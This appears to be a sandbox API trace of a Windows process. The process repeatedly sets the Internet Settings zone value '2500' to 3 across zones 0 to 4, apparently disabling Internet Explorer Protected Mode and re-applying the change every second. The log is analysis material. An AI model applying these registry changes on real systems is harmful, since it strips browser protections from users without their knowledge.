	[0101.004] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\") returned 68
	[0101.004] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x478) returned 0x0
	[0101.004] RegSetValueExA (in: hKey=0x478, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0101.004] RegCloseKey (hKey=0x478) returned 0x0
	[0101.004] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\") returned 68
	[0101.004] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x478) returned 0x0
	[0101.005] RegSetValueExA (in: hKey=0x478, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0101.005] RegCloseKey (hKey=0x478) returned 0x0
	[0101.005] Sleep (dwMilliseconds=0x3e8) 
	[0102.088] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\") returned 68
	[0102.088] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x690) returned 0x0
	[0102.088] RegSetValueExA (in: hKey=0x690, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0102.088] RegCloseKey (hKey=0x690) returned 0x0
	[0102.089] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\") returned 68
	[0102.089] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x690) returned 0x0
	[0102.089] RegSetValueExA (in: hKey=0x690, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0102.089] RegCloseKey (hKey=0x690) returned 0x0
	[0102.089] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\") returned 68
	[0102.089] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x690) returned 0x0
	[0102.089] RegSetValueExA (in: hKey=0x690, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0102.089] RegCloseKey (hKey=0x690) returned 0x0
	[0102.089] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\") returned 68
	[0102.089] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x690) returned 0x0
	[0102.089] RegSetValueExA (in: hKey=0x690, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0102.089] RegCloseKey (hKey=0x690) returned 0x0
	[0102.089] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\") returned 68
	[0102.089] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x690) returned 0x0
	[0102.089] RegSetValueExA (in: hKey=0x690, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0102.089] RegCloseKey (hKey=0x690) returned 0x0
	[0102.089] Sleep (dwMilliseconds=0x3e8) 
	[0103.126] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\") returned 68
	[0103.126] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x690) returned 0x0
	[0103.127] RegSetValueExA (in: hKey=0x690, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0103.127] RegCloseKey (hKey=0x690) returned 0x0
	[0103.127] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\") returned 68
	[0103.127] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x690) returned 0x0
	[0103.127] RegSetValueExA (in: hKey=0x690, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0103.127] RegCloseKey (hKey=0x690) returned 0x0
	[0103.127] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\") returned 68
	[0103.127] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x690) returned 0x0
	[0103.127] RegSetValueExA (in: hKey=0x690, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0103.127] RegCloseKey (hKey=0x690) returned 0x0
	[0103.127] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\") returned 68
	[0103.127] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x690) returned 0x0
	[0103.127] RegSetValueExA (in: hKey=0x690, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0103.128] RegCloseKey (hKey=0x690) returned 0x0
	[0103.128] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\") returned 68
	[0103.128] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x690) returned 0x0
	[0103.128] RegSetValueExA (in: hKey=0x690, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0103.128] RegCloseKey (hKey=0x690) returned 0x0
	[0103.128] Sleep (dwMilliseconds=0x3e8) 
	[0104.131] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\") returned 68
	[0104.131] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x694) returned 0x0
	[0104.132] RegSetValueExA (in: hKey=0x694, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0104.132] RegCloseKey (hKey=0x694) returned 0x0
	[0104.132] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\") returned 68
	[0104.132] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x694) returned 0x0
	[0104.132] RegSetValueExA (in: hKey=0x694, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0104.132] RegCloseKey (hKey=0x694) returned 0x0
	[0104.132] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\") returned 68
	[0104.132] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x694) returned 0x0
	[0104.133] RegSetValueExA (in: hKey=0x694, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0104.133] RegCloseKey (hKey=0x694) returned 0x0
	[0104.133] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\") returned 68
	[0104.133] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x694) returned 0x0
	[0104.133] RegSetValueExA (in: hKey=0x694, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0104.133] RegCloseKey (hKey=0x694) returned 0x0
	[0104.133] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\") returned 68
	[0104.133] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x694) returned 0x0
	[0104.133] RegSetValueExA (in: hKey=0x694, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0104.133] RegCloseKey (hKey=0x694) returned 0x0
	[0104.133] Sleep (dwMilliseconds=0x3e8) 
	[0105.134] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\") returned 68
	[0105.134] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x694) returned 0x0
	[0105.135] RegSetValueExA (in: hKey=0x694, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0105.135] RegCloseKey (hKey=0x694) returned 0x0
	[0105.135] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\") returned 68
	[0105.135] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x694) returned 0x0
	[0105.135] RegSetValueExA (in: hKey=0x694, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0105.135] RegCloseKey (hKey=0x694) returned 0x0
	[0105.135] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\") returned 68
	[0105.135] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x694) returned 0x0
	[0105.136] RegSetValueExA (in: hKey=0x694, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0105.136] RegCloseKey (hKey=0x694) returned 0x0
	[0105.136] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\") returned 68
	[0105.136] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x694) returned 0x0
	[0105.136] RegSetValueExA (in: hKey=0x694, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0105.136] RegCloseKey (hKey=0x694) returned 0x0
	[0105.137] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\") returned 68
	[0105.137] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x694) returned 0x0
	[0105.137] RegSetValueExA (in: hKey=0x694, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0105.137] RegCloseKey (hKey=0x694) returned 0x0
	[0105.137] Sleep (dwMilliseconds=0x3e8) 
	[0106.143] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\") returned 68
	[0106.143] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x694) returned 0x0
	[0106.144] RegSetValueExA (in: hKey=0x694, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0106.144] RegCloseKey (hKey=0x694) returned 0x0
	[0106.144] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\") returned 68
	[0106.144] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x694) returned 0x0
	[0106.144] RegSetValueExA (in: hKey=0x694, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0106.144] RegCloseKey (hKey=0x694) returned 0x0
	[0106.144] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\") returned 68
	[0106.144] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x694) returned 0x0
	[0106.144] RegSetValueExA (in: hKey=0x694, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0106.144] RegCloseKey (hKey=0x694) returned 0x0
	[0106.144] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\") returned 68
	[0106.144] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x694) returned 0x0
	[0106.145] RegSetValueExA (in: hKey=0x694, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0106.145] RegCloseKey (hKey=0x694) returned 0x0
	[0106.145] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\") returned 68
	[0106.145] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x694) returned 0x0
	[0106.145] RegSetValueExA (in: hKey=0x694, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0106.145] RegCloseKey (hKey=0x694) returned 0x0
	[0106.145] Sleep (dwMilliseconds=0x3e8) 
	[0107.165] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\") returned 68
	[0107.165] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x694) returned 0x0
	[0107.166] RegSetValueExA (in: hKey=0x694, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0107.166] RegCloseKey (hKey=0x694) returned 0x0
	[0107.166] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\") returned 68
	[0107.166] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x694) returned 0x0
	[0107.166] RegSetValueExA (in: hKey=0x694, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0107.166] RegCloseKey (hKey=0x694) returned 0x0
	[0107.166] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\") returned 68
	[0107.166] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x694) returned 0x0
	[0107.166] RegSetValueExA (in: hKey=0x694, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0107.166] RegCloseKey (hKey=0x694) returned 0x0
	[0107.166] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\") returned 68
	[0107.166] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x694) returned 0x0
	[0107.166] RegSetValueExA (in: hKey=0x694, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0107.167] RegCloseKey (hKey=0x694) returned 0x0
	[0107.167] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\") returned 68
	[0107.167] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x694) returned 0x0
	[0107.167] RegSetValueExA (in: hKey=0x694, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0107.167] RegCloseKey (hKey=0x694) returned 0x0
	[0107.167] Sleep (dwMilliseconds=0x3e8) 
	[0108.184] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\") returned 68
	[0108.184] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x694) returned 0x0
	[0108.185] RegSetValueExA (in: hKey=0x694, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0108.185] RegCloseKey (hKey=0x694) returned 0x0
	[0108.185] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\") returned 68
	[0108.185] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\1\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x694) returned 0x0
	[0108.185] RegSetValueExA (in: hKey=0x694, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0108.190] RegCloseKey (hKey=0x694) returned 0x0
	[0108.190] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\") returned 68
	[0108.190] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\2\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x694) returned 0x0
	[0108.190] RegSetValueExA (in: hKey=0x694, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0108.190] RegCloseKey (hKey=0x694) returned 0x0
	[0108.190] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\") returned 68
	[0108.190] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\3\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x694) returned 0x0
	[0108.190] RegSetValueExA (in: hKey=0x694, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0108.191] RegCloseKey (hKey=0x694) returned 0x0
	[0108.191] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\") returned 68
	[0108.191] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\4\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x694) returned 0x0
	[0108.191] RegSetValueExA (in: hKey=0x694, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0108.191] RegCloseKey (hKey=0x694) returned 0x0
	[0108.191] Sleep (dwMilliseconds=0x3e8) 
	[0109.298] wsprintfA (in: param_1=0x2c2fe00, param_2="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\%d\\" | out: param_1="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\") returned 68
	[0109.298] RegOpenKeyA (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Windows\\CurrentVersion\\Internet Settings\\Zones\\0\\", phkResult=0x2c2ff10 | out: phkResult=0x2c2ff10*=0x694) returned 0x0
	[0109.299] RegSetValueExA (in: hKey=0x694, lpValueName="2500", Reserved=0x0, dwType=0x4, lpData=0x2c2ff04*=0x3, cbData=0x4 | out: lpData=0x2c2ff04*=0x3) returned 0x0
	[0109.299] RegCloseKey (hKey=0x694) returned 0x0
